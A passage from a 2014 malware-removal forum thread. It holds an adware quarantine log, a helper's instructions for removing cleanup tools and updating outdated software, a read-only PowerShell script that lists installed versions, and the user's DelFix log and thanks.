Key: HKEY_LOCAL_MACHINE\SOFTWARE\VIEWPOINT    Quarantined Application.Win32.ViewBar (A)
C:\ProgramData\Ask    Quarantined Application.Win32.WebToolbar (A)
Key: HKEY_LOCAL_MACHINE\SOFTWARE\REGZOOKA    Quarantined Application.InstallAd (A)
Key: HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\{86D4B82A-ABED-442A-BE86-96357B70F4FE}    Quarantined Application.InstallAd (A)
Key: HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\VIEWPOINTMEDIAPLAYER    Quarantined Application.InstallAd (A)
Key: HKEY_LOCAL_MACHINE\SOFTWARE\APN    Quarantined Application.InstallAd (A)
Key: HKEY_LOCAL_MACHINE\SOFTWARE\AOL TOOLBAR    Quarantined Application.InstallAd (A)
Key: HKEY_USERS\S-1-5-21-941127145-1180520044-1929224469-1000\SOFTWARE\REGZOOKA    Quarantined Application.InstallAd (A)
Key: HKEY_USERS\S-1-5-21-941127145-1180520044-1929224469-1000\SOFTWARE\APN    Quarantined Application.InstallAd (A)
Key: HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\BROWSER HELPER OBJECTS\{95B7759C-8C7F-4BF1-B163-73684A933233}    Quarantined Application.BHO (A)
Key: HKEY_LOCAL_MACHINE\SOFTWARE\CLASSES\VIPROTOCOL.VIPROTOCOLOLE.1    Quarantined Application.AdReg (A)
Key: HKEY_LOCAL_MACHINE\SOFTWARE\CLASSES\VIPROTOCOL.VIPROTOCOLOLE    Quarantined Application.AdReg (A)
C:\Program Files\Common Files\software update utility    Quarantined Application.InstallUpd (A)
C:\Program Files\regzooka    Quarantined Application.AppInstall (A)
C:\Program Files\aol toolbar    Quarantined Application.AppInstall (A)
C:\Users\Dale\AppData\Local\aol toolbar    Quarantined Application.AppInstall (A)
C:\ProgramData\aol toolbar    Quarantined Application.AppInstall (A)

Quarantined    50
 



#11 aharonov


Posted 16 September 2014 - 12:01 PM

Yes, the stuff that Emsisoft has found is irrelevant.

That's it! Your logs look clean to me at the moment.
We're gonna clean up everything now, close security holes on your computer and in the end I'll provide you with a list of security tips so you hopefully will not need our help anymore in the future.


My help is free for everybody.
If you want to support me fighting against malware or buy me a beer for the assistance you received, then you can consider a donation.
Thank you!



Clean Up

Now we remove all the tools we used (including their logs and quarantine folders), restore your settings and delete old and infected system restore points:
  • You can uninstall programs that you had to install (e.g. MBAM or ESET Onlinescanner) in the control panel if you so wish.
  • Rename Combofix.exe to Uninstall.exe and execute it with a double click. (Beware that file extensions might be hidden. So don't add a double extension Uninstall.exe.exe.)
  • Download DelFix (by Xplode) and save it to your Desktop.
    • Close all running programs and start delfix.exe.
    • Make sure that all available options are checked.
    • Click on Run
    • DelFix should remove all our tools and delete itself afterwards. I don't need the log file.
  • If there is still something left you can delete it manually.


Closing security holes

Many infections happen via drive-by downloads that run unnoticed in the background while the user visits an infected website. To achieve this, malware exploits security holes in installed software (e.g. the browser or its plugins). Older versions of such software often have lots of known exploitable holes. Therefore it's very important to always keep your software up-to-date.
The following software is outdated. Make sure you remove all old versions and install the current one instead if you need the program:

Adobe Flash Player 11 ActiveX
Adobe Flash Player 11 Plugin
Adobe Reader X (10.1.4)
Java™ 6 Update 31
Mozilla Firefox 28.0 (x86 en-US)




Tips

I recommend reading and following the "16 simple and easy ways to keep your computer safe and secure on the Internet" by Lawrence Abrams.
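
A way to confirm that the old versions named in the post above are really gone after updating. This is an added example, not part of the original post or of any tool used in this topic; the name patterns and the function name Get-InstalledFamilyVersions are assumptions, and installers may word DisplayName differently.

```powershell
# Added example: list what is still installed for the product families named in the post.
# The patterns are assumptions about how the installers write DisplayName.
$families = @{
    'Adobe Flash Player' = '^Adobe Flash Player'
    'Adobe Reader'       = '^Adobe Reader'
    'Java'               = '^Java(\(TM\))? \d'
    'Mozilla Firefox'    = '^Mozilla Firefox'
}

# Uninstall keys: machine-wide, the 32-bit view on 64-bit Windows, and per-user installs.
$uninstallKeys = @(
    'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*',
    'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*',
    'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*'
)

function Get-InstalledFamilyVersions {
    param($Families, [string[]]$Keys)
    # Keys that do not exist (e.g. WOW6432Node on 32-bit Windows) are skipped silently.
    $entries = @(Get-ItemProperty -Path $Keys -ErrorAction SilentlyContinue |
        Where-Object { $_.DisplayName })
    foreach ($name in $Families.Keys) {
        foreach ($e in ($entries | Where-Object { $_.DisplayName -match $Families[$name] })) {
            New-Object PSObject -Property @{
                Family      = $name
                DisplayName = $e.DisplayName
                Version     = $e.DisplayVersion
                Key         = $e.PSPath -replace '^.*::', ''
            }
        }
    }
}

$found = @(Get-InstalledFamilyVersions -Families $families -Keys $uninstallKeys)
$found | Sort-Object Family, Version |
    Format-Table Family, DisplayName, Version -AutoSize

# Several distinct versions in one family means an old copy was left beside the new one.
foreach ($g in ($found | Group-Object Family)) {
    $versions = @($g.Group | ForEach-Object { $_.Version } | Sort-Object -Unique)
    if ($versions.Count -gt 1) {
        "Check $($g.Name): versions $($versions -join ', ') are installed side by side"
    }
}
```

The script only reads the registry and is written to run on the PowerShell 2.0 that ships with Windows 7; compare the versions it prints with the current release on each vendor's site.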

#12 mpl006


Posted 16 September 2014 - 09:10 PM

Here is the log from Delfix:

 

# Username : Dale - DIMENSION-E510
# Operating System : Windows 7 Ultimate Service Pack 1 (32 bits)

~ Activating UAC ... OK

~ Removing disinfection tools ...

Deleted : C:\Qoobox
Deleted : C:\32788R22FWJFW
Deleted : C:\FRST
Deleted : C:\ComboFix.txt
Deleted : C:\Users\Dale\Desktop\Addition.txt
Deleted : C:\Users\Dale\Desktop\Fixlog.txt
Deleted : C:\Users\Dale\Desktop\FRST.exe
Deleted : C:\Users\Dale\Desktop\FRST.txt
Deleted : C:\Users\Dale\Desktop\RogueKiller.exe
Deleted : C:\Users\Dale\Downloads\esetsmartinstaller_enu.exe
Deleted : C:\Windows\grep.exe
Deleted : C:\Windows\PEV.exe
Deleted : C:\Windows\NIRCMD.exe
Deleted : C:\Windows\MBR.exe
Deleted : C:\Windows\SED.exe
Deleted : C:\Windows\SWREG.exe
Deleted : C:\Windows\SWSC.exe
Deleted : C:\Windows\SWXCACLS.exe
Deleted : C:\Windows\Zip.exe
Deleted : HKCU\console_combofixbackup
Deleted : HKLM\SOFTWARE\Swearware
Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\combofix.exe
Deleted : HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\PEVSystemStart
Deleted : HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\procexp90.Sys
Deleted : HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\PEVSystemStart
Deleted : HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\procexp90.Sys

~ Creating registry backup ... OK

~ Cleaning system restore ...

Deleted : RP #210 [Windows Update | 09/12/2014 23:34:50]
Deleted : RP #211 [Windows Update | 09/13/2014 04:46:58]
Deleted : RP #212 [Removed SupportSoft Assisted Service | 09/16/2014 22:54:25]
Deleted : RP #213 [Windows Update | 09/16/2014 23:00:16]

New restore point created !

~ Resetting system settings ... OK
 

I will be applying the updates to the other software shortly.  Hopefully this is behind us and gone for good.



#13 aharonov


Posted 17 September 2014 - 07:52 PM

So everything is alright now and we can close this topic?

#14 mpl006


Posted 17 September 2014 - 10:30 PM

Yes.  It seems as though everything is running good.  Thanks so much for your help.



#15 aharonov


Posted 18 September 2014 - 05:56 AM

Thank you and take care.



